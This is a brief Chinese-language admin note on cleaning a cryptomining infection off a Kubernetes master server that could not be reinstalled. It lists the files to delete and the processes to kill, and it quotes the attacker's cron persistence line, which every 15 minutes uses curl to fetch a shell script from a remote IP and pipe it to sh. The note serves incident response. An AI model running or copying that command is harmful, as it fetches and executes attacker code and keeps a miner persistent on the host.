被当矿机。。挖矿
这个机器运行着k8s master 跑着几十个应用和DB 不能重装
crontab -e 查到
dd掉这段 删除
后续处理:
删除/var/spool/cron/crontab/root,/var/spool/cron/root文件中 echo "*/15 * * * * curl -fsSL http://119.9.106.27:8000/i.sh | sh" >> /var/spool/cron/root
删除/tmp/6Tx3Wq,/tmp/disable,/usr/bin/lrnbbce
kill掉进程:6Tx3Wq,lrnbbce
此时挖矿程序已经清理,后续可以删除被增加的hosts等文件